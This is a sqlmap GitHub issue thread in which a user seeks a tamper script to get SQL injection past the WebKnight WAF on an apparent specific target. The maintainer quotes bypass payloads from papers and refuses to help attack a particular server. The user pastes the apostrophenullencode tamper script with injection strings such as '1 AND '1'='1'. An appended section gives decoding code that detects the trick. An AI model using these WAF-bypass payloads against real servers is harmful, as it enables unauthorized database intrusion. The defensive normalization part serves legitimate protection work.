sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Tamper Script for WAF - AQTRONIX WebKnight *Looking for* #957

Closed angelz12 closed 9 years ago

angelz12 commented 9 years ago

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

http://www.aqtronix.com/?PageID=99

stamparm commented 9 years ago

If you don't have a solution to give I'll need to close this down

angelz12 commented 9 years ago

http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf
http://www.exploit-db.com/papers/17934/

frequencies for the bypass: http://nl.ijs.si:3003/cuwi/dgt_en/frequencies/lc

This I found, maybe this works...

stamparm commented 9 years ago

A) http://ipv4.os3.nl/_media/2013-2014/courses/ot/andreas_george.pdf says: "When running the same test against WebKnight we had one successful attempt while using the 'apostrophenullencode' tamper script" -> so you can use --tamper=apostrophenullencode, which I doubt will work in your case.

B) http://www.exploit-db.com/papers/17934/ says: "From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server." -> this doesn't work. Correct me if I am wrong.

Please don't open this kind of Issues if you don't have a solution to give. Learn something about WAF bypasses and then come back. I'll just close further requests like this as invalid.

P.S. It's obvious from previous Issue requests that you have one target with WebKnight on it. Don't open this kind of Issue requests where you are openly asking for help to attack a specific web server.

angelz12 commented 9 years ago

So that's the normal 'apostrophenullencode'; how can I activate it? The script bypass is green.

```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces apostrophe character with its illegal double unicode counterpart

    >>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'
    """

    return payload.replace('\'', "%00%27") if payload else payload
```

---

Bypass of the pdf file, I hope that's correct, watch here:

'apostrophenullencode' changed according to the pdf:

```python
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces apostrophe character with its illegal double unicode counterpart

    >>> tamper("' or '1'='1")
    '%00%27 or %00%271%00%27=%00%271'
    """

    return payload.replace('\'', "%00%27") if payload else payload
```

When I open these scripts in Python the bypass is in green like a notice; isn't it activated? Can you show me how the bypass can be run, or am I thinking wrong here?
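The tamper script above only does one thing: it rewrites every `'` as `%00%27`, so a filter that looks for apostrophes in the raw, undecoded query string never sees one. The defender-side point is that input must be percent-decoded and stripped of NUL bytes before any signature check. The following is an added example, not sqlmap code and not part of this issue; it assumes a filter that matches on the raw string (the weakness this tamper relies on) and shows the normalized check beside it, using the doctest strings from the script as constructed sample input.

```python
import urllib.parse

# Constructed samples: the payload from the tamper script's doctest, as sent
# untampered and as rewritten by apostrophenullencode.
ORIGINAL = "1 AND '1'='1"
TAMPERED = "1 AND %00%271%00%27=%00%271"


def naive_contains_apostrophe(raw):
    """A filter that inspects the raw query string without decoding it.
    This is the (assumed) weak behaviour that %00%27 slips past."""
    return "'" in raw


def normalize(raw, max_rounds=3):
    """Percent-decode until the string stops changing and drop NUL bytes.
    Decoding is bounded by max_rounds so nested encodings cannot stall
    the check; NULs are removed because many back ends treat them as
    terminators and effectively ignore them."""
    current = raw
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(current).replace("\x00", "")
        if decoded == current:
            break
        current = decoded
    return current


def normalized_contains_apostrophe(raw):
    """The same check run after normalization: what the database would see."""
    return "'" in normalize(raw)


def inspect(raw):
    """Return both verdicts side by side for one parameter value."""
    return {
        "raw": raw,
        "normalized": normalize(raw),
        "naive_flagged": naive_contains_apostrophe(raw),
        "normalized_flagged": normalized_contains_apostrophe(raw),
    }


if __name__ == "__main__":
    for sample in (ORIGINAL, TAMPERED):
        print(inspect(sample))
```

Run stand-alone, the script prints that the tampered value is missed by the raw-string check but flagged once normalized, and that normalization recovers exactly the original `1 AND '1'='1`. The design choice worth copying is the decode loop with a fixed cap: decoding once catches `%27`, but decoding until stable is what makes the check robust against double-encoded variants without letting an attacker-controlled string make the loop unbounded.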